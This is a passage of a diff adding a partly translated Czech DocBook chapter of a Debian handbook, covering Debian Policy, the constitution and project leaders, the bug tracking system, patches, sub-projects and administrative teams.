+      <ulink type="block" url="https://wiki.debian.org/Teams" /></para>
+
+      <sidebar>
+        <title><emphasis>NÁSTROJ</emphasis>Databáze vývojářů</title>
+        <indexterm><primary>vývojáři</primary> <secondary>databáze vývojářů</secondary></indexterm>
+        <indexterm><primary>databáze</primary> <secondary>databáze vývojářů</secondary></indexterm>
+
+	<para>Debian has a database including all developers registered
+	with the project, and their relevant information (address,
+	telephone, geographical coordinates such as longitude and latitude,
+	etc.). Some of the information (first and last name, country, username
+	within the project, IRC username, GnuPG key, etc.) is public and
+	available on the Web.
+	<ulink type="block" url="https://db.debian.org/" /></para>
+
+	<para>Zeměpisné souřadnice umožňují vytvoření mapy s umístěním všech vývojářů po celém světě. Debian je skutečně mezinárodní projekt: jeho vývojáře lze nalézt na všech kontinentech, i když většina je v “západních zemích”.</para>
+
+        
+        <figure>
+          <title>Celosvětové rozmístění vývojářů Debianu</title>
+          <mediaobject>
+            <imageobject>
+              <imagedata fileref="images/developers-map.png" scalefit="1" width="70%" />
+            </imageobject>
+          </mediaobject>
+          <indexterm><primary>rozmístění po celém světě</primary></indexterm>
+        </figure>
+      </sidebar>
+
+      <para>Package maintenance is a relatively regimented activity, very
+      documented or even regulated. It must, in effect, comply with all the
+      standards established by the <emphasis>Debian Policy</emphasis>.
+      Fortunately, there are many tools that facilitate the maintainer's work.
+      The developer can, thus, focus on the specifics of their package and
+      on more complex tasks, such as squashing bugs. <ulink type="block" url="https://www.debian.org/doc/debian-policy/" /></para>
+
+      <sidebar>
+        <title><emphasis>ZPĚT K ZÁKLADŮM</emphasis>Údržba balíčků, práce vývojáře</title>
+        <indexterm><primary>údržba</primary> <secondary>údržba balíčků</secondary></indexterm>
+        <indexterm><primary>balíček</primary> <secondary>údržba</secondary></indexterm>
+
+	<para>Údržba balíčku znamená nejprve “balení” programu. Konkrétně to znamená definovat prostředky instalace tak, aby po instalaci tento program fungoval a dodržoval pravidla, která projekt Debian pro sebe stanovil. Výsledek této operace je uložen v souboru <filename>.deb</filename>. Účinná instalace programu pak nebude vyžadovat nic víc než extrakci tohoto komprimovaného archivu a spuštění některých předinstalačních nebo poinstalačních zde obsažených skriptů.</para>
+
+	<para>Po této počáteční fázi, cyklus údržby opravdu začíná: Příprava aktualizací podle nejnovějších Zásad Debianu, opravy chyb hlášených uživateli a zahrnutí nových “upstreamových” verzí programu, které se přirozeně i nadále současně vyvíjejí. Například v době počátečního balení byl program ve verzi 1.2.3. Po několika měsících vývoje, původní autoři vydávají novou stabilní verzi, očíslovanou 1.4.0. V tuto chvíli by měl správce Debianu balíček aktualizovat, aby uživatelé mohli využívat nejnovější stabilní verzi.</para>
+      </sidebar>
+      <indexterm><primary>Zásady Debianu</primary></indexterm>
+      <indexterm><primary>Zásady Debianu</primary></indexterm>
+      <indexterm><primary>zásady</primary></indexterm>
+
+      <para>The Policy, an essential element of the Debian Project,
+      establishes the norms ensuring both the quality of the packages and
+      perfect interoperability of the distribution. Thanks to this Policy,
+      Debian remains consistent despite its gigantic size. This Policy is
+      not fixed in stone, but continuously evolves thanks to proposals
+      formulated on the <email>debian-policy@lists.debian.org</email>
+      mailing list. Amendments that are agreed upon by all interested parties are accepted and
+      applied to the text by a small group of maintainers who have no
+      editorial responsibility (they only include the modifications agreed
+      upon by the Debian developers that are members of the above-mentioned
+      list). You can read current amendment proposals on the bug tracking
+      system: <ulink type="block" url="https://bugs.debian.org/debian-policy" /></para>
+
+      <sidebar>
+        <title><emphasis>KOMUNITA</emphasis> Proces vydávání Zásad</title>
+
+	<para>Kdokoli může navrhnout změnu v Zásadách Debianu pouhým odesláním chybového hlášení s úrovní závažnosti “přání” proti <emphasis role="pkg">debian-policy</emphasis> balíčku. Proces, který se spustí, je dokumentován v <filename>/usr/share/doc/debian-policy/Process.html </filename>: Pokud je uznáno, že zjištěný problém musí být vyřešen vytvořením nového pravidla v Zásadách Debianu, začíná diskuze na seznamu elektronické pošty <email>debian-policy@lists.debian.org</email>, dokud není dosaženo shody a návrh je vydán. Někdo potom návrhne požadovanou změnu a předloží ke schválení (v podobě patche k přezkoumání). Jakmile dva další vývojáři schválí skutečnost, že navrhovaná změna odráží shodu dosaženou v předchozí diskusi (proces “secondování”), návrh může být zařazen do úředního dokumentu jedním ze správců balíčku <emphasis role="pkg">debian-policy</emphasis>. Pokud proces selže v jednom z těchto kroků, správci uzavřou chybu a klasifikují návrh jako zamítnutý.</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>ZÁSADY DEBIANU</emphasis> dokumentace</title>
+        <indexterm><primary>dokumentace</primary> <secondary>umístění</secondary></indexterm>
+        <indexterm><primary>umístění dokumentu</primary></indexterm>
+        <indexterm><primary> <filename>/usr/share/doc/</filename> </primary></indexterm>
+        <indexterm><primary> <filename>README.Debian</filename> </primary></indexterm>
+        <indexterm><primary> <filename>NEWS.Debian.gz</filename> </primary></indexterm>
+
+	<para>Dokumentace pro každý balíček je uložena v <filename>/usr/share/doc/<replaceable>balíček</replaceable>/</filename>. Tento adresář často obsahuje soubor <filename>README.Debian</filename>, popisující specifické úpravy Debianu, které provádí správce balíčku. Je tedy moudré přečíst si tento soubor před jakýmkoliv nastavováním, a těžit z těchto zkušeností. Nalezneme také soubor <filename>changelog.Debian.gz</filename> popisující změny provedené správcem Debianu při přechodu z jedné verze na následující. To by se nemělo zaměňovat se souborem <filename>changelog.gz</filename> (nebo jeho obdobami), který popisuje změny provedené upstreamovými vývojáři. Soubor <filename>copyright</filename> obsahuje informace o autorech a o licenci vztahující se na software. A na závěr také můžeme najít soubor s názvem <filename>NEWS.Debian.gz</filename>, který vývojářům Debianu umožňuje sdělovat důležité informace týkající se aktualizací; Pokud je nainstalován <emphasis>apt-listchanges</emphasis>, zobrazí se tyto zprávy automaticky. Všechny ostatní soubory jsou specifické pro daný software. Především bychom chtěli poukázat na podadresář <filename>examples</filename>, který často obsahuje příklady konfiguračních souborů.</para>
+      </sidebar>
+
+      <para>Zásady do značné míry pokrývají technické aspekty balíčků. Velikost projektu také vyvolává organizační problémy; ty jsou řešeny Stanovami Debianu, které vytváří strukturu a prostředky pro rozhodování. Jinými slovy, formální systém řízení.</para>
+      <indexterm><primary>stanovy</primary></indexterm>
+      <indexterm><primary>vedoucí projektu Debian</primary></indexterm>
+      <indexterm><primary>DPL</primary></indexterm>
+      <indexterm><primary>vedoucí</primary> <secondary>role</secondary></indexterm>
+      <indexterm><primary>vedoucí</primary><secondary>zvolení</secondary></indexterm>
+
+      <para>Stanovy definují určitý počet rolí a postů, plus jejich odpovědnosti a pravomoce. Zejména je třeba poznamenat, že vývojáři Debianu mají vždy konečný rozhodovací pravomoc hlasováním o obecném usnesení, kde je vyžadována kvalifikovaná většina tří čtvrtin (75%) hlasů pro učinění významných změn (např. s dopadem na dokumenty nadace). Nicméně, vývojáři každoročně volí “vedoucího”, aby je zastupoval na schůzkách, a zajistit vnitřní koordinaci mezi různými týmy. Tato volba je vždy obdobím intenzivních diskuzí. Role vedoucího není formálně definována žádným dokumentem: kandidáti na tento post obvykle navrhují vlastní definice pozice. V praxi role vedoucího zahrnuje zastupování vůči sdělovacím prostředkům, koordinaci mezi “interními” týmy a zajišťování celkového vedení projektu, na kterém se vývojáři mohou podílet: záměry DPL jsou implicitně schvalovány většinou členů projektu.</para>
+
+      <para>V podstatě má vedoucí opravdové pravomoce; jejich zvolení vzešla z těsných hlasování; mohou učinit jakékoli rozhodnutí, které již není pod pravomocí někoho jiného a mohou delegovat části svých povinností.</para>
+      <indexterm><primary>Murdock, Ian</primary></indexterm>
+      <indexterm><primary>Perens, Bruce</primary></indexterm>
+      <indexterm><primary>Jackson, Ian</primary></indexterm>
+      <indexterm><primary>Akkerman, Wichert</primary></indexterm>
+      <indexterm><primary>Collins, Ben</primary></indexterm>
+      <indexterm><primary>Garbee, Bdale</primary></indexterm>
+      <indexterm><primary>Michlmayr, Martin</primary></indexterm>
+      <indexterm><primary>Robinson, Branden</primary></indexterm>
+      <indexterm><primary>Towns, Anthony</primary></indexterm>
+      <indexterm><primary>McIntyre, Steve</primary></indexterm>
+      <indexterm><primary>McIntyre, Steve</primary></indexterm>
+      <indexterm><primary>Zacchiroli, Stefano</primary></indexterm>
+      <indexterm><primary>Nussbaum, Lucas</primary></indexterm>
+      <indexterm><primary>Dogguy, Mehdi</primary></indexterm>
+      <indexterm><primary>Lamb, Chris</primary></indexterm>
+
+      <para>Since its inception, the project has been successively led by
+      Ian Murdock, Bruce Perens, Ian Jackson, Wichert Akkerman, Ben
+      Collins, Bdale Garbee, Martin Michlmayr, Branden Robinson, Anthony
+      Towns, Sam Hocevar, Steve McIntyre, Stefano Zacchiroli, Lucas
+      Nussbaum, Mehdi Dogguy and Chris Lamb.</para>
+      <indexterm><primary>technická komise</primary></indexterm>
+
+      <para>Stanovy rovněž definují “technickou komisi”. Hlavní úlohou této komise je rozhodovat v technických otázkách, pokud se zúčastnění vývojáři mezi sebou nedohodnou. Jinak má tato komise roli rádce pro vývojáře, kterému se nepodařilo učinit rozhodnutí, za které má odpovědnost. Je důležité poznamenat, že se zapojí pouze v případě, kdy je k tomu jednou ze zainteresovaných stran vyzvána.</para>
+      <indexterm><primary>tajemník projektu</primary></indexterm>
+
+      <para>A konečně stanovy definují pozici “tajemníka projektu”, který má na starosti organizaci hlasování v souvislosti s různými volbami a obecnými usneseními.</para>
+
+      <para>The “general resolution” procedure is fully detailed in the
+      constitution, from the initial discussion period to the final
+      counting of votes. The most interesting aspect of that process is
+      that when it comes to an actual vote, developers have to rank the
+      different ballot options between them and the winner is selected
+      with a <ulink url="https://en.wikipedia.org/wiki/Condorcet_method">Condorcet
+        method</ulink> (more specifically, the Schulze method). For
+      further details see: <ulink type="block" url="http://www.debian.org/devel/constitution.en.html" /></para>
+      <indexterm><primary>obecné usnesení</primary></indexterm>
+      <indexterm><primary>hlasování</primary></indexterm>
+
+      <sidebar>
+        <title><emphasis>KULTURA</emphasis> Flamewar, diskuse, která zachytí požár</title>
+        <indexterm><primary>flamewar</primary></indexterm>
+        <indexterm><primary>horká debata</primary></indexterm>
+
+	<para>“Flamewar” je mimořádně vášnivá debata, která často končí s lidmi napadajícími se navzájemm, jakmile všechny rozumné argumentace byly vyčerpána na obou stranách. Některá témata jsou častěji předmětem polemik než ostatní (volba textového editoru, “dáváte přednost <command>vi</command> nebo <command>emacsu</command>?”, je staré oblíbené). Tyto věci často vyvolávají velmi rychlé výměny emailů v důsledku velkého počtu lidí se stanoviskem k této záležitosti (všichni) a velmi osobní povahu takových námitek.</para>
+
+	<para>Obecně, nic zvlášť užitečného z takových diskusí nevzejde; Všeobecné doporučení je zůstat mimo takové debaty a asi rychle prolistovat jejich obsah, protože jejich čtení v plném rozsahu by bylo příliš časově náročné.</para>
+      </sidebar>
+
+      <para>I když stanovy vytváří zdání demokracie, denní realita je zcela odlišná: Debian přirozeně dodržuje pravidla svobodného softwaru do-ocracie: ten, kdo dělá věci rozhoduje, jak je dělat. Mnoho času může být vyplýtváno debatováním o jednotlivých přínosech různých cest, jak přistupovat k problému; zvolené řešení bude to první, která je obojí - funkční a uspokojující..., které vyjde z času, který do něj způsobilá osoba vložila.</para>
+
+      <para>To je jediný způsob, jak si vysloužit ostruhy: udělat něco užitečného a ukázat, že se pracovalo dobře. Mnoho “administrativních” týmů Debianu působí za pomocí kooptace, upřednostňující dobrovolníky, kteří již efektivně přispěli a prokázali svou schopnost. Veřejná podstata práce těchto týmů umožňuje novým přispěvatelům pozorovat a začít pomáhat bez zvláštních privilegií. Proto je Debian často popisován jako “meritokracie”.</para>
+
+      <sidebar>
+        <title><emphasis>KULTURA</emphasis> Meritokracie, vláda znalostí</title>
+        <indexterm><primary>meritokracie</primary></indexterm>
+
+	<para>Meritokracie je forma vlády, v níž je autorita vykonávána těmi, kteří mají největší zásluhy. Pro Debian, jsou zásluhy měřítkem kompetence, která je sama o sobě, posuzována sledováním dřívějších činností jednoho nebo více lidí v rámci projektu (Stefano Zacchiroli, bývalý vedoucí projektu, hovoří o “do-okracii”, což znamená “moc pro ty, kteří věci dělají”). Jejich prostá existence dokazuje určitou úroveň kompetence; jejich úspěchy obecně je svobodný software, s dostupným zdrojovým kódem, který může být snadno přezkoumán ostatními k posouzení jejich kvality.</para>
+      </sidebar>
+
+      <para>Tato účinná operativní metoda zaručuje kvalitu přispěvatelů v “klíčových” týmech Debianu. Tato metoda není v žádném případě dokonalá a občas se vyskytnou tací, kteří nepřijmou tento způsob fungování. Výběr vývojářů přijatých do týmů se může zdát trochu svévolný, nebo dokonce nespravedlivý. Navíc, ne každý má stejnou představu o službách očekávaných od těchto týmů. Pro někoho je nepřijatelné muset čekat osm dní pro zahrnutí nového debianovského balíčku, zatímco ostatní budou trpělivě čekat tři týdny bez problémů. Jako takové, se pravidelně vyskytují stížnosti od těch nespokojených na “kvalitu služeb” některých týmů.</para>
+
+      <sidebar>
+        <title><emphasis>KOMUNITA</emphasis> Začleňování nových správců</title>
+        <indexterm><primary>správce</primary><secondary>nový správce</secondary></indexterm>
+
+	<para>Tým, který má na starosti přijímání nových vývojářů, je pravidelně nejvíce kritizován. Je třeba uznat, že v průběhu let se debianovský projekt stává stále náročnějším pro vývojáře, které bude přijímat. Někteří lidé v tom mohou vidět nespravedlnost, musíme ale přiznat, že to, co se jevilo jako malá výzva na začátku se stalo výzvou mnohem větší ve společenství čítajícím více než 1 000 lidí, pokud jde o zajištění kvality a integrity všeho, co Debian produkuje pro své uživatele.</para>
+        <indexterm><primary>DAM</primary></indexterm>
+        <indexterm><primary>Account manažeři Debianu</primary></indexterm>
+
+	<para>Dále, postup přijetí je ukončen přezkoumáním kandidatury malým týmem - account manažery Debianu. Tito manažeři jsou také obzvláště vystaveni kritice, protože mají konečné slovo v přijetí nebo odmítnutí dobrovolníka v rámci komunity vývojářů Debianu. V praxi, musí někdy zpozdit přijetí osoby, aby se dozvěděli více o činnosti projektu. Člověk může samozřejmě přispívat k Debianu i před přijetím za oficiálního vývojářáře tím, že je zaštiťován vývojáři současnými.</para>
+      </sidebar>
+    </section>
+    <section>
+      <title>Aktivní role uživatelů</title>
+
+      <para>Jeden by mohl nadnést, zda je vůbec důležité zmiňovat uživatele zároveň s těmi, kteří pracují v rámci projektu Debian, ale odpověď je definitivní ano: hrají důležitou roli v projektu. Někteří uživatelé jsou daleko od toho být nazýváni “pasivními”, někteří spouštějí vývojové verze Debianu a pravidelně zakládají hlášení o chybách a upozorňují na problémy. Jiní jdou ještě dál a předkládají nápady pro zlepšení tím, že podávají hlášení o chybě s úrovní závažnosti “přání”, nebo dokonce předkládají opravy zdrojového kódu nazvané “patche” (viz postranní informace <xref linkend="sidebar.patch" />).</para>
+
+      <sidebar id="sidebar.bts">
+        <title><emphasis>NÁSTROJ</emphasis> Systém na sledování chyb</title>
+        <indexterm><primary>systém</primary><secondary>Systém na sledování chyb</secondary></indexterm>
+        <indexterm><primary>BTS</primary></indexterm>
+        <indexterm><primary>Systém an sledování chyb (BTS)</primary></indexterm>
+        <indexterm><primary><literal>bugs.debian.org</literal></primary></indexterm>
+
+	<para>Sledovcí systém chyb Debianu (Debian BTS) je používán velkými částmi projektu. Veřejná část (webové rozhraní) umožňuje uživatelům zobrazit všechny ohlášené chyby, s možností zobrazit seřazený seznam chyb vybraných podle různých kritérií, jako například: dotčený balíček, závažnost, stav, adresa ohlašovatele, adresa zodpovědného správce, tag, apod. Je také možné procházet celý historický výpis všech diskusí týkajících se jednotlivých chyb.</para>
+
+	<para>Pod povrchem je Debian BTS založen na e-mailu: všechny informace, které uchovává, pocházejí ze zpráv odeslaných různými osobami. Všechny e-maily odeslané na <email>12345@bugs.debian.org</email> budou tedy přiřazeny k historii chyby číslo 12345. Oprávněné osoby mohou chybu “uzavřítٌ” napsáním zprávy popisující důvody rozhodnutí o uzavření na <email>12345-Done@bugs.debian.org</email> (chyba je uzavřena, pokud je uvedený problém vyřešen nebo již není relevantní). Nová chyba je hlášena zasláním e-mailu na <email>Submit@bugs.debian.org</email> podle konkrétního formátu, který identifikuje dotyčný balíček. Adresa <email>Control@bugs.debian.org</email> umožňuje editaci všech “meta-informací” vztahujících se k chybě.</para>
+
+	<para>The Debian BTS has other functional features, as well, such as
+	the use of tags for labeling bugs. For more information, see <ulink type="block" url="https://www.debian.org/Bugs/" /></para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>SLOVNÍČEK</emphasis> Závažnost chyby</title>
+        <indexterm><primary>závažnost</primary></indexterm>
+        <indexterm><primary>chyba</primary><secondary>závažnost</secondary></indexterm>
+
+	<para>Závažnost chyby formálně přiřazuje reportovanému problému stupeň důležitosti. V praxi, ne všechny chyby mají stejnou důležitost; například překlep na stránce manuálu se nemůže rovnat bezpečnostnímu riziku v softwaru serveru.</para>
+
+	<para>Debian uses an extended scale to describe the severity
+	of a bug. Each level is defined precisely in order to
+	facilitate the selection thereof. <ulink type="block" url="https://www.debian.org/Bugs/Developer#severities" /></para>
+      </sidebar>
+
+      <para>Additionally, numerous satisfied users of the service offered
+      by Debian like to make a contribution of their own to the project. As
+      not everyone has appropriate levels of expertise in programming, they
+      may choose to assist with the translation and review of
+      documentation. There are language-specific mailing lists to coordinate
+      this work.
+      <ulink type="block" url="https://lists.debian.org/i18n.html" />
+      <ulink type="block" url="https://www.debian.org/international/" />
+      </para>
+
+      <sidebar>
+        <title><emphasis>ZPĚT K ZÁKLADŮM</emphasis> Co je to i18n a l10n?</title>
+        <indexterm><primary>internacionalizace</primary></indexterm>
+        <indexterm><primary>lokalizace</primary></indexterm>
+        <indexterm><primary>i18n</primary></indexterm>
+        <indexterm><primary>l10n</primary></indexterm>
+
+	<para>“i18n” a “l10n” jsou zkratky slov “internacionalizace” a “lokalizace”, respektive, ponechání prvního a posledního písmena z každého slova a počet písmen uprostřed.</para>
+
+	<para>“Internacionalizování” programu spočívá v jeho modifikaci, kdy může být přeložen (lokalizován). To obnáší částečné přepsání programu původně napsaného pro fungování v jednom jazyku za účelem možnosti jeho otevření ve všech jazycích.</para>
+
+	<para>“Lokalizace” programu spočívá v překladu původních zpráv (často v angličtině) do jiného jazyka. Abychom toho dosáhli, musí být již program internacializován.</para>
+
+	<para>Abychom to shrnuli, internacionalizace připravuje software pro překlad, který je potom spuštěn lokalizací.</para>
+      </sidebar>
+
+      <sidebar id="sidebar.patch">
+        <title><emphasis>ZPĚT K ZÁKLADŮM</emphasis> Patch, způsob zasílání oprav</title>
+        <indexterm><primary><command>patch</command></primary></indexterm>
+        <indexterm><primary>patch</primary></indexterm>
+        <indexterm><primary><command>diff</command></primary></indexterm>
+
+	<para>Patch je soubor popisující změny, které mají být provedeny na jednom nebo více odkazovaných souborech. Konkrétně, obsahuje seznam řádků k odstranění nebo přidání do kódu, stejně jako (někdy) řádky odebrané z referenčního textu, nahrazující modifikace v kontextu (umožňující identifikaci umístění změn, pokud čísla řádlů byla změněna).</para>
+
+	<para>Nástroj používaný pro uplatnění modifikací předávaných v takovém souboru je jednoduše nazýván <command>patch</command>. nástroj, který jej vytváří se jmenuje <command>diff</command> a používá se takto:</para>
+
+        <screen><computeroutput>$ </computeroutput><userinput>diff -u file.old file.new &gt;file.patch</userinput></screen>
+
+	<para>Soubor <filename>file.patch</filename> obsahuje instrukce pro provedení obsahových změn <filename>file.old</filename> na <filename>file.new</filename>. Můžeme jej poslat někomu, kdo jej dokáže použít k vytvoření <filename>file.new</filename> z těch ostatních dvou, tímto způsobem:</para>
+
+        <screen><computeroutput>$ </computeroutput><userinput>patch -p0 file.old &lt;file.patch</userinput></screen>
+
+	<para>Soubor, <filename>file.old</filename>, je nyní identický s <filename>file.new</filename>.</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>NÁSTROJ</emphasis> Nahlásit chybu <command>reportbugem</command></title>
+        <indexterm><primary><command>reportbug</command></primary></indexterm>
+        <indexterm><primary>chyba</primary><secondary>nahlásit chybu</secondary></indexterm>
+        <indexterm><primary>nahlásit chybu</primary></indexterm>
+
+	<para>The <command>reportbug</command> tool facilitates sending bug
+	reports on a Debian package. It helps making sure the bug in
+	question hasn't already been filed, thus preventing redundancy in the
+	system. It reminds the user of the definitions of the severity
+	levels, for the report to be as accurate as possible (the developer
+	can always fine-tune these parameters later, if needed). It helps
+	writing a complete bug report without the user needing to know the
+	precise syntax, by writing it and allowing the user to edit it.
+        This report will then be sent via an e-mail server (by default,
+        a remote one run by Debian, but <command>reportbug</command> can
+        also use a local server).</para>
+
+	<para>Tento nástroj se nejdříve zaměřuje na vývojové verze, což je místo, kde jsou chyby opraveny. V praxi nejsou chyby ve stabilní verzi Debianu vítány, s velmi málo vyjímkami pro bezpečnostní aktualizace nebo důležité aktualizace (pokud, například, balíček vůbec nefunguje). Náprava menší chyby v debianovském balíčku musí tak počkat na další stabilní verzi.</para>
+      </sidebar>
+
+      <para>Všechny tyto příspěvkové mechanismy se stávají více efektivními díky chování uživatelů. Uživatelé jsou daleko tomu být skupinou izolovaných osob, jsou naopak komunitou, kde se spousta výměnných činností děje. Obzvláště sledujeme obdivuhodnou aktivitu na diskuzních emailových seznamech uživatelů, <email>debian-user@lists.debian.org</email> (<xref linkend="solving-problems" /> se tomu detailněji věnuje).</para>
+
+      <para>Nejen, že uživatelé pomáhají sobě (i ostatním) s technickými věcmi, které se jich bezprostředně týkají, ale také diskutují o nejlepších způsobech, jak přispět k debianovskému projektu a posunout jej dál - diskutování, které často vede k návrhům na vylepšení.</para>
+
+      <para>Protože Debian nevydává žádné prostředky na žádnou sebepropagační kampaň, jeho uživatelé hrají podstatnou roli v jeho rozšiřování a tím upevňování jeho věhlasu prostřednictvím osobních rozhovorů apod.</para>
+
+      <para>This method functions quite well, since Debian fans are found
+      at all levels of the free software community: from install parties
+      (workshops where seasoned users assist newcomers to install the
+      system) organized by local LUGs or “Linux User Groups”, to
+      association booths at large tech conventions dealing with Linux,
+      etc.</para>
+
+      <para>Volunteers make posters, brochures, stickers, and other
+      useful promotional materials for the project, which they make
+      available to everyone, and which Debian provides freely on its
+      website and on its wiki: <ulink type="block" url="https://www.debian.org/events/material" /></para>
+    </section>
+    <section>
+      <title>Týmy a podprojekty</title>
+
+      <para>Debian byl od samého počátku organizován kolem konceptu zdrojových balíčků, každý se svým správcem nebo skupinou správců. Časem se vytvořilo hodně pracovních týmů, zabezpečujících administrativu infrastruktury, řízení úkolů nepatřících k žádnému konlrétnímu balíčku (zajišťování kvality, zásady Debianu, instalace, apod.), spolu s posledními týmy, které vyrostly kolem podprojektů.</para>
+      <section id="sect.sub-projects">
+        <title>Současné podprojekty Debianu</title>
+
+	<para>To each their own Debian! A sub-project is a group of
+	volunteers interested in adapting Debian to specific
+	needs. Beyond the selection of a sub-group of programs
+	intended for a particular domain (education, medicine,
+	multimedia creation, etc.), sub-projects are also involved in
+	improving existing packages, packaging missing software,
+	adapting the installer, creating specific documentation, and
+	more.</para>
+
+        <sidebar>
+          <title><emphasis>VOCABULARY</emphasis> Sub-project and derivative distribution</title>
+          <indexterm><primary>dílčí projekt</primary></indexterm>
+          <indexterm><primary>derivative distribution</primary></indexterm>
+
+	  <para>The development process for a derivative distribution
+	  consists in starting with a particular version of Debian and
+	  making a number of modifications to it. The infrastructure used
+	  for this work is completely external to the Debian project. There
+	  isn't necessarily a policy for contributing improvements. This
+	  difference explains how a derivative distribution may
+	  “diverge” from its origins, and why they have to regularly
+	  resynchronize with their source in order to benefit from
+	  improvements made upstream.</para>
+
+	  <para>On the other hand, a sub-project can not diverge, since all
+	  the work on it consists of directly improving Debian in order to
+	  adapt it to a specific goal.</para>
+
+	  <para>The most known distribution derived from Debian is, without
+	  a doubt, Ubuntu, but there are many. See <xref linkend="derivative-distributions" /> to learn about their
+	  particularities and their positioning in relationship to
+	  Debian.</para>
+        </sidebar>
+
+        
+	<para>Here is a small selection of current sub-projects:</para>
+        <itemizedlist>
+          <listitem>
+	    <para>Debian-Junior, by Ben Armstrong, offering an appealing
+	    and easy to use Debian system for children;</para>
+          </listitem>
+          <listitem>
+	    <para>Debian-Edu, by Petter Reinholdtsen, focused on the
+	    creation of a specialized distribution for the academic
+	    world;</para>
+          </listitem>
+          <listitem>
+	    <para>Debian Med, by Andreas Tille, dedicated to the medical
+	    field;</para>
+          </listitem>
+          <listitem>
+            <para>Debian Multimedia which deals with audio and multimedia
+            work;</para>
+          </listitem>
+          <listitem>
+            <para>Debian-Desktop which focuses on the desktop and coordinates
+            artwork for the default theme;</para>
+          </listitem>
+          <listitem>
+            <para>Debian GIS which takes care of Geographical Information Systems
+            applications and users;</para>
+          </listitem>
+          <listitem>
+            <para>Debian Accessibility, finally, improving Debian to match the
+            requirements of people with disabilities.</para>
+          </listitem>
+        </itemizedlist>
+
+	<para>This list will most likely continue to grow with time and
+	improved perception of the advantages of Debian sub-projects. Fully
+	supported by the existing Debian infrastructure, they can, in
+	effect, focus on work with real added value, without worrying about
+	remaining synchronized with Debian, since they are developed within
+	the project.</para>
+      </section>
+      <section>
+        <title>Administrative Teams</title>
+
+	<para>Most administrative teams are relatively closed and recruit
+	only by cooptation. The best means to become a part of one is to
+	intelligently assist the current members, demonstrating that you
+	have understood their objectives and methods of operation.</para>
+
+	<para>The ftpmasters are in charge of the official archive of
+	Debian packages. They maintain the program that receives packages
+	sent by developers and automatically stores them, after some
+	checks, on the reference server
+	(<literal>ftp-master.debian.org</literal>).</para>
+
+	<para>They must also verify the licenses of all new packages,
+	in order to ensure that Debian may distribute them, prior to
+	including them in the corpus of existing packages. When a
+	developer wishes to remove a package, they address this team
+	through the bug tracking system and the
+	<emphasis>ftp.debian.org</emphasis> “pseudo-package”.</para>
+        <indexterm><primary>ftpmaster</primary></indexterm>
+
+        <sidebar>
+          <title><emphasis>VOCABULARY</emphasis> The pseudo-package, a monitoring tool</title>
+          <indexterm><primary>pseudo-package</primary></indexterm>
+
+	  <para>The bug tracking system, initially designed to
+	  associate bug reports with a Debian package, has proved very
+	  practical to manage other matters: lists of problems to be
+	  resolved or tasks to manage without any link to a particular
+	  Debian package. The “pseudo-packages” allow, thus, certain
+	  teams to use the bug tracking system without associating a
+	  real package with their team. Everyone can, thus, report
+	  issues that needs to be dealt with. For instance, the BTS
+	  has a <emphasis>ftp.debian.org</emphasis> entry that is used
+	  to report and track problems on the official package archive
+	  or simply to request removal of a package. Likewise, the
+	  <emphasis>www.debian.org</emphasis> pseudo-package refers to
+	  errors on the Debian website, and
+	  <emphasis>lists.debian.org</emphasis> gathers all the
+	  problems concerning the mailing lists.</para>
+        </sidebar>
+
+        <sidebar id="sidebar.gitlab">
+          <title><emphasis>TOOL</emphasis> GitLab, Git repository hosting and much more</title>
+          <indexterm><primary><literal>salsa.debian.org</literal></primary></indexterm>
+          <indexterm><primary>GitLab</primary></indexterm>
+
+          <para>
+            A GitLab instance, known as <literal>salsa.debian.org</literal>,
+            is used by Debian to host the Git packaging repositories
+            but this software offers much more than simple hosting and Debian
+            contributors have been quick to leverage the continuous integration
+            features (running tests, or even building packages, on each push).
+            Debian contributors also benefit from a cleaner contribution
+            workflow thanks the well understood merge request process (similar
+            to GitHub's pull requests).
+          </para>
+          <para>
+            GitLab replaced FusionForge (which was running on
+            a service known as <literal>alioth.debian.org</literal>)
+            for collaborative package maintainance. This service
+            is administered by Alexander Wirt, Bastian Blank and
+            Jörg Jaspert.
+            <ulink type="block" url="https://salsa.debian.org/" />
+            <ulink type="block" url="https://wiki.debian.org/Salsa/Doc" />
+          </para>
+        </sidebar>
+
+	<para id="dsa-team">The <emphasis>Debian System Administrators</emphasis> (DSA) team
+	(<email>debian-admin@lists.debian.org</email>), as one might
+	expect, is responsible for system administration of the many
+	servers used by the project. They ensure optimal functioning of all
+	base services (DNS, Web, e-mail, shell, etc.), install software
+	requested by Debian developers, and take all precautions in regards
+        to security.
+        <ulink type="block" url="https://dsa.debian.org" /></para>
+        <indexterm><primary><emphasis>debian-admin</emphasis></primary></indexterm>
+	<indexterm><primary>DSA (Debian System Administrators)</primary></indexterm>
+
+        <sidebar>
+          <title><emphasis>TOOL</emphasis> Debian Package Tracker</title>
+          <indexterm><primary>package tracking system</primary></indexterm>
+          <indexterm><primary>system</primary><secondary>package tracking system</secondary></indexterm>
+          <indexterm><primary>Debian Package Tracker</primary></indexterm>
+          <indexterm><primary>tracker</primary><secondary>Debian Package Tracker</secondary></indexterm>
+          <indexterm><primary>package</primary><secondary>Debian Package Tracker</secondary></indexterm>
+          <indexterm><primary>PTS</primary></indexterm>
+          <indexterm><primary>DDPO</primary></indexterm>
+          <indexterm><primary>Debian Developer's Packages Overview</primary></indexterm>
+
+	  <para>This is one of Raphaël's creations. The basic idea is, for
+	  a given package, to centralize as much information as possible on
+	  a single page. Thus, one can quickly check the status of a
+	  program, identify tasks to be completed, and offer one's
+	  assistance. This is why this page gathers all bug statistics,
+	  available versions in each distribution, progress of a package in
+	  the <emphasis role="distribution">Testing</emphasis>
+	  distribution, the status of translations of descriptions and
+	  debconf templates, the possible availability of a new upstream
+	  version, notices of noncompliance with the latest version of the
+	  Debian Policy, information on the maintainer, and any other
+          information that said maintainer wishes to include.
+          <ulink type="block" url="https://tracker.debian.org/" /></para>
+
+	  <para>An e-mail subscription service completes this web
+	  interface. It automatically sends the following selected
+	  information to the list: bugs and related discussions,
+	  availability of a new version on the Debian servers, new
+	  translations available for proofreading, etc.</para>
+
+	  <para>Advanced users can, thus, follow all of this information
+	  closely and even contribute to the project, once they have got a
+	  good enough understanding of how it works.</para>
+
+	  <para>Another web interface, known as <emphasis>Debian
+	  Developer's Packages Overview</emphasis> (DDPO), provides each
+	  developer a synopsis of the status of all Debian packages placed
+          under their charge.
+          <ulink type="block" url="https://qa.debian.org/developer.php" /></para>
+
+	  <para>These two websites are tools developed and managed by
